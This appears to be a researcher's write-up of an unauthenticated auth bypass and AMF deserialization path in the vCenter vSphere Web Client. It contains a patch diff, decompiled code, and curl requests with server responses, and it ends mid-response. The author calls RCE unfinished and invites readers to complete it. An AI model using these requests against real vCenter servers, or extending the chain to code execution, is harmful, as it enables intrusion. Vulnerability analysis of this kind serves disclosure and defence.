Description

The vSphere Web Client (FLEX/Flash) contains an unauthorized arbitrary file read vulnerability. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to gain access to sensitive information.

Add Assessment

wvu-r7 (437)

December 06, 2021 9:04am UTC (2 years ago)•Edited 2 years ago

Technical Analysis

The Long Tail of CVE-2017-5641

This is not CVE-2021-21980 or CVE-2021-22049 but rather a curious case of AMF deserialization that was patched against auth bypass in the same update. My notes are as follows. RCE is incomplete, but maybe you can finish it!

Analyzing the patch and discovering the auth bypass

   public void doFilter(ServletRequest paramServletRequest, ServletResponse paramServletResponse, FilterChain paramFilterChain) throws IOException, ServletException {
@@ -90,13 +122,11 @@ public class SessionManagementFilter implements Filter {
       SessionUtil.setHttpRequest(httpServletRequest);
       addHstsHeader(httpServletRequest, httpServletResponse);
       String str = httpServletRequest.getRequestURI();
-      boolean bool = str.endsWith("download/logs");
-      if (this._clientIdSecurityEnabled && bool) {
-        boolean bool1 = validateClientId(httpServletRequest, httpServletResponse);
-        if (!bool1) {
-          httpServletResponse.setStatus(401);
-          return;
-        }
+      if (this._authenticationProtectionEnabled &&
+        !isSessionAuthenticated(httpServletRequest.getSession()) && !SessionUtil.isRequestWithValidSessionIndexCookie(httpServletRequest)) {
+        _logger.warn("Rejecting request for URI: " + str + " without a valid client id!");
+        httpServletResponse.setStatus(401);
+        return;
       }
       if (this._isH5Client || str.endsWith(".html")) {
         HttpSession httpSession = httpServletRequest.getSession(true);

  private boolean validateClientId(HttpServletRequest paramHttpServletRequest, HttpServletResponse paramHttpServletResponse) {
    String str1 = SessionUtil.getClientId(paramHttpServletRequest.getSession());
    String str2 = extractClientId(paramHttpServletRequest);
    return (str1 != null || str2 != null);
  }

  private String extractClientId(HttpServletRequest paramHttpServletRequest) {
    String str = paramHttpServletRequest.getHeader("webClientSessionId");
    if (str == null)
      str = paramHttpServletRequest.getParameter("webClientSessionId");
    return str;
  }

Testing a `GET` request without the `webClientSessionId` parameter

wvu@kharak:~$ curl -kv https://172.16.57.237/vsphere-client/download/logs
*   Trying 172.16.57.237:443...
* Connected to 172.16.57.237 (172.16.57.237) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* ALPN, server did not agree to a protocol
* Server certificate:
*  subject: CN=172.16.57.237; C=US
*  start date: Nov 30 23:59:14 2021 GMT
*  expire date: Dec  1 11:59:14 2023 GMT
*  issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=photon-machine; OU=VMware Engineering
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
> GET /vsphere-client/download/logs HTTP/1.1
> Host: 172.16.57.237
> User-Agent: curl/7.80.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 401
< Set-Cookie: JSESSIONID=87EF28C1FB437E91D3A46739E6FC1774; Path=/vsphere-client; Secure; HttpOnly
< Content-Length: 0
< Date: Sat, 04 Dec 2021 00:57:08 GMT
< Server: Anonymous
<
* Connection #0 to host 172.16.57.237 left intact
wvu@kharak:~$

Testing a `GET` request with the `webClientSessionId` parameter

wvu@kharak:~$ curl -kv https://172.16.57.237/vsphere-client/download/logs?webClientSessionId=nope
*   Trying 172.16.57.237:443...
* Connected to 172.16.57.237 (172.16.57.237) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* ALPN, server did not agree to a protocol
* Server certificate:
*  subject: CN=172.16.57.237; C=US
*  start date: Nov 30 23:59:14 2021 GMT
*  expire date: Dec  1 11:59:14 2023 GMT
*  issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=photon-machine; OU=VMware Engineering
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
> GET /vsphere-client/download/logs?webClientSessionId=nope HTTP/1.1
> Host: 172.16.57.237
> User-Agent: curl/7.80.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 405
< Set-Cookie: JSESSIONID=3DDE7D387076B9E7814A940DACA2B6B4; Path=/vsphere-client; Secure; HttpOnly; SameSite=None
< Allow: POST
< Cache-Control: no-cache, no-store, max-age=0, must-revalidate
< Pragma: no-cache
< Expires: 0
< Strict-Transport-Security: max-age=31536000 ; includeSubDomains
< X-XSS-Protection: 1; mode=block
< X-Frame-Options: SAMEORIGIN
< X-Content-Type-Options: nosniff
< Content-Type: text/html;charset=utf-8
< Content-Language: en
< Content-Length: 749
< Date: Sat, 04 Dec 2021 00:57:46 GMT
< Server: Anonymous
<
* Connection #0 to host 172.16.57.237 left intact
<!doctype html><html lang="en"><head><title>HTTP Status 405 – Method Not Allowed</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 405 – Method Not Allowed</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> Request method &#39;GET&#39; not supported</p><p><b>Description</b> The method received in the request-line is known by the origin server but not supported by the target resource.</p><hr class="line" /><h3>Apache Tomcat/8.5.61</h3></body></html>wvu@kharak:~$

[2021-12-04T00:57:46.537Z] [WARN ] http-nio-9090-exec-2         70000066 ###### ###### o.s.web.servlet.mvc.support.DefaultHandlerExceptionResolver       Resolved exception caused by handler execution: org.springframework.web.HttpRequestMethodNotSupportedException: Request method 'GET' not supported

Testing a `POST` request with the `webClientSessionId` parameter

wvu@kharak:~$ curl -kv https://172.16.57.237/vsphere-client/download/logs -d webClientSessionId=nope
*   Trying 172.16.57.237:443...
* Connected to 172.16.57.237 (172.16.57.237) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* ALPN, server did not agree to a protocol
* Server certificate:
*  subject: CN=172.16.57.237; C=US
*  start date: Nov 30 23:59:14 2021 GMT
*  expire date: Dec  1 11:59:14 2023 GMT
*  issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=photon-machine; OU=VMware Engineering
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
> POST /vsphere-client/download/logs HTTP/1.1
> Host: 172.16.57.237
> User-Agent: curl/7.80.0
> Accept: */*
> Content-Length: 23
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200
< Set-Cookie: JSESSIONID=950054453E83C0E133D9048BD60EEB61; Path=/vsphere-client; Secure; HttpOnly
< Cache-Control: no-cache, no-store, max-age=0, must-revalidate
< Pragma: no-cache
< Expires: 0
< Strict-Transport-Security: max-age=31536000 ; includeSubDomains
< X-XSS-Protection: 1; mode=block
< X-Frame-Options: SAMEORIGIN
< X-Content-Type-Options: nosniff
< Content-Length: 0
< Date: Sat, 04 Dec 2021 00:58:47 GMT
< Server: Anonymous
<
* Connection #0 to host 172.16.57.237 left intact
wvu@kharak:~$

[2021-12-04T00:58:47.452Z] [WARN ] http-nio-9090-exec-5         70000067 ###### ###### com.vmware.vsphere.client.logbundle.DownloadLogController         ClientId is null.
[2021-12-04T00:58:47.452Z] [ERROR] http-nio-9090-exec-5         70000067 ###### ###### com.vmware.vsphere.client.logbundle.DownloadLogController         There is no spec for downloading logs in the request.

Analyzing the `DownloadLogController` class and discovering AMF deserialization

  @RequestMapping(method = {RequestMethod.POST})
  public void downloadLogBundles(final HttpServletRequest request, final HttpServletResponse response) throws IOException, Exception {
    final DownloadingLogsTask downloadingLogsTask;
    final HttpSession session = request.getSession();
    Map<String, String[]> map = request.getParameterMap();
    final String clientId = SessionUtil.getClientId(httpSession);
    if (str == null)
      _logger.warn("ClientId is null.");
    final SelectedLogsSpec selectedLogsSpec = processSelectedLogsSpecParameter(map);
    final Collection<LogBundleDownloadSpec> logBundleDownloadSpecs = processLogBundleDownloadSpecs(map);
    if (selectedLogsSpec == null && collection == null) {
      _logger.error("There is no spec for downloading logs in the request.");
      return;
    }
    ManagedObjectReference managedObjectReference = DownloadingLogsTask.findTaskTarget(selectedLogsSpec, collection);
    if (managedObjectReference != null) {
      int i = extractFileIdParam(map);
      downloadingLogsTask = new DownloadingLogsTask(str, managedObjectReference, i, this._queryExecutor, this._taskRegistry);
    } else {
      downloadingLogsTask = null;
    }
    try {
      final ZipOutputStream zipStream = new ZipOutputStream((OutputStream)response.getOutputStream());
      Runnable runnable = new Runnable() {
          public void run() {
            try {
              SessionUtil.setHttpRequest(request);
              SessionUtil.setHttpSession(session);
              response.setContentType("application/zip");
              if (selectedLogsSpec == null) {
                KeyStore keyStore = DownloadLogController.this._keystoreService.getKeyStore();
                Map map = DownloadLogController.this.parseParameters(logBundleDownloadSpecs, clientId, keyStore);
                DownloadLogController.this.writeZipFile(map, zipStream, clientId, downloadingLogsTask);
              } else {
                if (selectedLogsSpec.vCenterLogsIncluded) {
                  ManagedObjectReference managedObjectReference = DownloadLogController.this.invokeGenerateLogBundlesTask(selectedLogsSpec.targetObjectReference, clientId);
                  DownloadLogController.this.writeVcLogsToStream(zipStream, managedObjectReference, selectedLogsSpec, clientId, downloadingLogsTask);
                  DownloadLogController.this.writeHostLogsToStream(zipStream, selectedLogsSpec, clientId, downloadingLogsTask);
                } else {
                  DownloadLogController.this.writeHostLogsToStream(zipStream, selectedLogsSpec, clientId, downloadingLogsTask);
                }
                zipStream.finish();
              }
              if (downloadingLogsTask != null)
                downloadingLogsTask.updateState(TaskState.SUCCESS, null);
            } catch (InterruptedException interruptedException) {
              DownloadLogController._logger.info("Downloading logs task thread was interrupted.");
              Thread.currentThread().interrupt();
            } catch (WriteIOException writeIOException) {
              if (downloadingLogsTask != null) {
                DownloadLogController._logger.info("Downloading logs is cancelled.");
                DownloadLogController._logger.debug("Exception in downloading logs: ", writeIOException);
                downloadingLogsTask.updateState(TaskState.CANCELED, null);
              }
            } catch (Exception exception) {
              DownloadLogController._logger.error("Error downloading logs.", exception);
              if (downloadingLogsTask != null) {
                TaskState taskState = downloadingLogsTask.getState();
                if (!TaskState.CANCELED.equals(taskState))
                  downloadingLogsTask.updateState(TaskState.ERROR, exception);
              }
            }
          }
        };
      FutureTask futureTask = new FutureTask(runnable, null);
      if (downloadingLogsTask != null)
        TaskUtil.addClientTaskKeyFutureCloseablePair(downloadingLogsTask
            .getKey(), futureTask, zipOutputStream);
      try {
        ExecutorUtil.executeTasks(
            Collections.singleton(futureTask), this._executor);
      } catch (InterruptedException interruptedException) {}
      if (downloadingLogsTask != null)
        TaskUtil.removeClientTaskKeyFromMap(downloadingLogsTask.getKey());
    } catch (Exception exception) {
      if (downloadingLogsTask != null && TaskState.RUNNING ==

        (downloadingLogsTask.getClientTaskInfo()).state)
        downloadingLogsTask.updateState(TaskState.ERROR, exception);
      throw exception;
    }
  }

  private SelectedLogsSpec processSelectedLogsSpecParameter(Map<String, String[]> paramMap) throws IOException {
    String[] arrayOfString = paramMap.get("SelectedLogsSpec");
    if (ArrayUtil.isNullOrEmpty((Object[])arrayOfString))
      return null;
    return parseSelectedLogsSpec(arrayOfString[0]);
  }

  private static SelectedLogsSpec parseSelectedLogsSpec(String paramString) throws IOException {
    Base64.Decoder decoder = new Base64.Decoder();
    decoder.decode(paramString);
    byte[] arrayOfByte = decoder.flush();
    ClassLoader classLoader1 = TypeMarshallingContext.getTypeMarshallingContext().getClassLoader();
    ClassLoader classLoader2 = SelectedLogsSpec.class.getClassLoader();
    Amf3Input amf3Input = new Amf3Input(getAmfSerializationContext(classLoader2));
    amf3Input.setInputStream(new ByteArrayInputStream(arrayOfByte));
    SelectedLogsSpec selectedLogsSpec = null;
    try {
      while (amf3Input.available() > 0) {
        Object object = amf3Input.readObject();
        if (object instanceof SelectedLogsSpec) {
          selectedLogsSpec = (SelectedLogsSpec)object;
        } else if (object instanceof Object[]) {
          for (Object object1 : (Object[])object) {
            if (object1 instanceof SelectedLogsSpec) {
              selectedLogsSpec = (SelectedLogsSpec)object1;
              break;
            }
          }
        } else if (object instanceof Map) {
          for (SelectedLogsSpec selectedLogsSpec1 : ((Map)object).values()) {
            if (selectedLogsSpec1 instanceof SelectedLogsSpec) {
              selectedLogsSpec = selectedLogsSpec1;
              break;
            }
          }
        }
        if (selectedLogsSpec != null)
          break;
      }
    } catch (ClassNotFoundException classNotFoundException) {
      _logger.warn("The AMF deserialization fails.", classNotFoundException);
    } finally {
      amf3Input.close();
      TypeMarshallingContext.getTypeMarshallingContext()
        .setClassLoader(classLoader1);
    }
    return selectedLogsSpec;
  }

Testing AMF deserialization using a bogus string

wvu@kharak:~$ curl -kv https://172.16.57.237/vsphere-client/download/logs -d "webClientSessionId=nope&SelectedLogsSpec=lol"
*   Trying 172.16.57.237:443...
* Connected to 172.16.57.237 (172.16.57.237) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* ALPN, server did not agree to a protocol
* Server certificate:
*  subject: CN=172.16.57.237; C=US
*  start date: Nov 30 23:59:14 2021 GMT
*  expire date: Dec  1 11:59:14 2023 GMT
*  issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=photon-machine; OU=VMware Engineering
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
> POST /vsphere-client/download/logs HTTP/1.1
> Host: 172.16.57.237
> User-Agent: curl/7.80.0
> Accept: */*
> Content-Length: 44
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 500
< Set-Cookie: JSESSIONID=587387E51FA794E6CE03FB9DBB454777; Path=/vsphere-client; Secure; HttpOnly
< Cache-Control: no-cache, no-store, max-age=0, must-revalidate
< Pragma: no-cache
< Expires: 0
< Strict-Transport-Security: max-age=31536000 ; includeSubDomains
< X-XSS-Protection: 1; mode=block
< X-Frame-Options: SAMEORIGIN
< X-Content-Type-Options: nosniff
< Content-Type: text/html;charset=utf-8
< Content-Length: 2977
< Date: Sat, 04 Dec 2021 01:02:05 GMT
< Connection: close
< Server: Anonymous
<



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- saved from url=(0014)about:internet -->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
      <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
      <style type="text/css" media="screen">
         html {
            background: #3075ab; /* Old browsers */
            background: -moz-linear-gradient(top,  #3a8dc8 0%, #183a62 100%); /* FF3.6+ */
            background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#3a8dc8), color-stop(100%,#183a62)); /* Chrome,Safari4+ */
            background: -webkit-linear-gradient(top,  #3a8dc8 0%,#183a62 100%); /* Chrome10+,Safari5.1+ */
            background: -o-linear-gradient(top,  #3a8dc8 0%,#183a62 100%); /* Opera 11.10+ */
            background: -ms-linear-gradient(top,  #3a8dc8 0%,#183a62 100%); /* IE10+ */
            background: linear-gradient(to bottom,  #3a8dc8 0%,#183a62 100%); /* W3C */
            filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#3a8dc8', endColorstr='#183a62',GradientType=0 ); /* IE6-9 */
            background-repeat: no-repeat;

            height: 100%;
            overflow: auto;
            margin: 0;
            padding: 0;
         }

         #errorAreaWrapper {
            position: relative;
            float: left;
            left: 50%;
            margin-top: 30px;
         }

         #errorArea {
            position: relative;
            float: left;
            left: -50%;
            padding: 15px;
            background-color: white;
            font-size: 14px;
            color: #000000;
            font-family: Georgia, Arial, Helvetica, sans-serif;
            border: 1px solid black;
         }

         #errorImage {
            border: 0;
            margin-right: 10px;
            display: inline-block;
            vertical-align: top;
         }

         #errorAllText {
            display: inline-block;
            vertical-align: top;
            min-width: 500px;
            max-width: 700px;
         }

         #errorSorry {
            font-weight: bold;
         }

         #errorMessage {
            padding-top: 10px;
            padding-bottom: 10px;
         }

         #errorCheckLog {
            font-style: italic;
         }
      </style>
   </head>
   <body>
      <div id="errorAreaWrapper">
        <div id="errorArea">
          <div id="errorImage"><img src="/vsphere-client/assets/warning48x.png" alt="Error" /></div>
          <div id="errorAllText">
             <div id="errorSorry">A server error occurred.</div>
             <div id="errorMessage">a partial block (3 of 4 bytes) was dropped, decoded data is probably truncated!</div>
             <div id="errorCheckLog">Check the vSphere Web Client server logs for details.</div>
          </div>
        </div>
      </div>
   </body>
</html>
* Closing connection 0
* TLSv1.2 (OUT), TLS alert, close notify (256):
wvu@kharak:~$

[2021-12-04T01:02:05.830Z] [WARN ] http-nio-9090-exec-8         70000068 ###### ###### com.vmware.vsphere.client.logbundle.DownloadLogController         ClientId is null.
[2021-12-04T01:02:05.831Z] [ERROR] http-nio-9090-exec-8          o.a.c.c.C.[.[localhost].[/vsphere-client].[downloadManager]       Servlet.service() for servlet [downloadManager] in context with path [/vsphere-client] threw exception [Request processing failed; nested exception is java.lang.IllegalStateException: a partial block (3 of 4 bytes) was dropped, decoded data is probably truncated!] with root cause java.lang.IllegalStateException: a partial block (3 of 4 bytes) was dropped, decoded data is probably truncated!
	at flex.messaging.util.Base64$Decoder.flush(Base64.java:136)
	at com.vmware.vsphere.client.logbundle.DownloadLogController.parseSelectedLogsSpec(DownloadLogController.java:732)
	at com.vmware.vsphere.client.logbundle.DownloadLogController.processSelectedLogsSpecParameter(DownloadLogController.java:584)
	at com.vmware.vsphere.client.logbundle.DownloadLogController.downloadLogBundles(DownloadLogController.java:201)
	at sun.reflect.GeneratedMethodAccessor196.invoke(Unknown Source)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at org.springframework.web.bind.annotation.support.HandlerMethodInvoker.invokeHandlerMethod(HandlerMethodInvoker.java:181)
	at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.invokeHandlerMethod(AnnotationMethodHandlerAdapter.java:440)
	at org.springframework.web.servlet.mvc.annotation.AnnotationMethodHandlerAdapter.handle(AnnotationMethodHandlerAdapter.java:428)
	at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:967)
	at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:901)
	at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:970)
	at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:872)
	at javax.servlet.http.HttpServlet.service(HttpServlet.java:661)
	at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:846)
	at javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:231)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:317)
	at org.springframework.security.web.access.intercept.FilterSecurityInterceptor.invoke(FilterSecurityInterceptor.java:127)
	at org.springframework.security.web.access.intercept.FilterSecurityInterceptor.doFilter(FilterSecurityInterceptor.java:91)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.access.ExceptionTranslationFilter.doFilter(ExceptionTranslationFilter.java:114)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.session.SessionManagementFilter.doFilter(SessionManagementFilter.java:137)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.authentication.AnonymousAuthenticationFilter.doFilter(AnonymousAuthenticationFilter.java:111)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.authentication.rememberme.RememberMeAuthenticationFilter.doFilter(RememberMeAuthenticationFilter.java:150)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.servletapi.SecurityContextHolderAwareRequestFilter.doFilter(SecurityContextHolderAwareRequestFilter.java:170)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.savedrequest.RequestCacheAwareFilter.doFilter(RequestCacheAwareFilter.java:63)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.authentication.AbstractAuthenticationProcessingFilter.doFilter(AbstractAuthenticationProcessingFilter.java:200)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.authentication.logout.LogoutFilter.doFilter(LogoutFilter.java:116)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.header.HeaderWriterFilter.doFilterInternal(HeaderWriterFilter.java:66)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.context.request.async.WebAsyncManagerIntegrationFilter.doFilterInternal(WebAsyncManagerIntegrationFilter.java:56)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.context.SecurityContextPersistenceFilter.doFilter(SecurityContextPersistenceFilter.java:105)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at com.vmware.vise.security.websso.SecurityRequestWrapperFilter.doFilterInternal(SecurityRequestWrapperFilter.java:47)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:331)
	at org.springframework.security.web.FilterChainProxy.doFilterInternal(FilterChainProxy.java:214)
	at org.springframework.security.web.FilterChainProxy.doFilter(FilterChainProxy.java:177)
	at org.springframework.web.filter.DelegatingFilterProxy.invokeDelegate(DelegatingFilterProxy.java:347)
	at org.springframework.web.filter.DelegatingFilterProxy.doFilter(DelegatingFilterProxy.java:263)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at com.vmware.vise.security.SessionManagementFilter.doFilter(SessionManagementFilter.java:177)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at com.vmware.vsphere.client.logging.MDCLogFilter.doFilterInternal(MDCLogFilter.java:41)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at com.vmware.vise.extensionfw.DeploymentFilter.doFilter(DeploymentFilter.java:55)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at com.vmware.vise.util.jsp.JspFilter.doFilterInternal(JspFilter.java:91)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at com.vmware.vise.security.SameSiteCookieHeaderFilter.doFilter(SameSiteCookieHeaderFilter.java:73)
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
	at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:199)
	at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97)
	at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:544)
	at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:143)
	at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:81)
	at org.apache.catalina.valves.RemoteIpValve.invoke(RemoteIpValve.java:764)
	at org.eclipse.virgo.web.tomcat.support.ApplicationNameTrackingValve.invoke(ApplicationNameTrackingValve.java:33)
	at org.apache.catalina.valves.AbstractAccessLogValve.invoke(AbstractAccessLogValve.java:690)
	at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78)
	at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:343)
	at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:616)
	at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65)
	at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:831)
	at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1634)
	at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
	at java.lang.Thread.run(Thread.java:748)

Testing AMF deserialization using a Base64-encoded string

wvu@kharak:~$ curl -kv https://172.16.57.237/vsphere-client/download/logs -d "webClientSessionId=nope&SelectedLogsSpec=QQ=="
*   Trying 172.16.57.237:443...
* Connected to 172.16.57.237 (172.16.57.237) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* ALPN, server did not agree to a protocol
* Server certificate:
*  subject: CN=172.16.57.237; C=US
*  start date: Nov 30 23:59:14 2021 GMT
*  expire date: Dec  1 11:59:14 2023 GMT
*  issuer: CN=CA; DC=vsphere; DC=local; C=US; ST=California; O=photon-machine; OU=VMware Engineering
*  SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.
> POST /vsphere-client/download/logs HTTP/1.1
> Host: 172.16.57.237
> User-Agent: curl/7.80.0
> Accept: */*
> Content-Length: 45
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 500
